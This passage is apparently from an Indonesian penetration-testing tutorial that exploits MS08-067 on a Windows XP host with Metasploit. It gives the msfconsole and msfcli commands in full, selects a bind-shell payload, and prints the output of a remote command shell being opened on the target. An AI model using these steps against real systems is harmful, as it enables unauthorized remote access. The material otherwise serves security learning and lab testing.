    3 Windows XP SP2 English (NX)
    4 Windows XP SP3 English (NX)
    -------- cut -----------

Sekarang kita tentukan jenis payload yang ingin dipakai. Dalam langkah ini saya ingin menggunakan tcp_bind shell (akses command prompt di kompi target) :

    msf exploit(ms08_067_netapi) > set payload windows/shell_bind_tcp
    payloads => windows/shell_bind_tcp

Untuk melihat payload apa saja dalam metasploit, gunakan perintah :

    msf exploit(ms08_067_netapi) > show payloads
    Compatible payloads
    ===================
    Name Description
    ---- -----------
    generic/debug_trap Generic x86 Debug Trap
    generic/debug_trap/bind_ipv6_tcp Generic x86 Debug Trap, Bind TCP Stager (IPv6)
    generic/debug_trap/bind_nonx_tcp Generic x86 Debug Trap, Bind TCP Stager (No NX Support)
    generic/debug_trap/bind_tcp Generic x86 Debug Trap, Bind TCP Stager
    ----------- dipotong sampai disini ---------------

Nahh.. setting sudah selesai dilakukan. Untuk melihat hasil konfigurasinya bisa dicek kembali dengan menggunakan show options :

    msf exploit(ms08_067_netapi) > show options
    Module options:
    Name Current Setting Required Description
    ---- --------------- -------- -----------
    RHOST 192.168.1.28 yes The target address
    RPORT 445 yes Set the SMB service port
    SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

    Payload options (windows/shell_bind_tcp):
    Name Current Setting Required Description
    ---- --------------- -------- -----------
    EXITFUNC thread yes Exit technique: seh, thread, process
    LPORT 4444 yes The local port
    RHOST 192.168.1.28 no The target address
    Exploit target:
    Id Name
    -- ----
    0 Automatic Targeting

sekarang jalankan exploit :

    msf exploit(ms08_067_netapi) > exploit
    [*] Started bind handler
    [*] Automatically detecting the target...
    [*] Fingerprint: Windows XP Service Pack 2 - lang:English
    [*] Selected Target: Windows XP SP2 English (NX)
    [*] Triggering the vulnerability...
    [*] Command shell session 1 opened (192.168.1.6:33270 -> 192.168.1.28:4444)

    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.

    C:\WINDOWS\system32>ipconfig
    ipconfig
    Windows IP Configuration
    Ethernet adapter Local Area Connection:

    Connection-specific DNS Suffix . :
    IP Address. . . . . . . . . . . . : 192.168.1.28
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
    Default Gateway . . . . . . . . . : 192.168.1.254

    C:\WINDOWS\system32>

Dan ternyata emang masih bolong… :p

Metasploit : msfcli
Dari langkah-langkah diatas… sebenarnya bisa dilakukan exploitasi dengan menggunakan satu perintah dari console, dan diakomodir dengan menggunakan msfcli yang notabene sebenarnya adalah metasploit command line interface.
Untuk melihat manual perintahnya bisa dilihat dari help maupun manpage-nya wiki-nya metasploit.

    sinchan@hydra:~$ msfcli –help
    [*] Please wait while we load the module tree...
    Error: Invalid module: --help
    Usage: /usr/local/bin/msfcli [mode]
    =================================================================
    Mode Description
    ---- -----------
    (H)elp You're looking at it baby!
    (S)ummary Show information about this module
    (O)ptions Show available options for this module
    (A)dvanced Show available advanced options for this module
    (I)DS Evasion Show available ids evasion options for this module
    (P)ayloads Show available payloads for this module
    (T)argets Show available targets for this exploit module
    (AC)tions Show available actions for this auxiliary module
    (C)heck Run the check routine of the selected module
    (E)xecute Execute the selected module

So.. mari kita coba. Contoh kasusnya sama seperti artikel msfconsole biar ndak capek nulisnya yaitu:

    IP Addr Target : 192.168.1.28
    Port target : 445
    Exploit : windows/smb/ms08_067_netapi
    Payload : windows/shell_bind_tcp
    Exploit target : 0

Dan implementasinya menjadi seperti ini :

    sinchan@hydra:~$ msfcli exploit/windows/smb/ms08_067_netapi RHOST=192.168.1.28 TARGET=0 PAYLOAD=generic/shell_bind_tcp E
    [*] Please wait while we load the module tree...
    [*] Started bind handler
    [*] Automatically detecting the target...
    [*] Fingerprint: Windows XP Service Pack 2 - lang:English
    [*] Selected Target: Windows XP SP2 English (NX)
    [*] Triggering the vulnerability...
    [*] Command shell session 1 opened (192.168.1.6:36804 -> 192.168.1.28:4444)

    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.

    C:\WINDOWS\system32>ipconfig
    ipconfig
    Windows IP Configuration
    Ethernet adapter Local Area Connection:
    Connection-specific DNS Suffix . :
    IP Address. . . . . . . . . . . . : 192.168.1.28
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
    Default Gateway . . . . . . . . . : 192.168.1.254
    C:\WINDOWS\system32>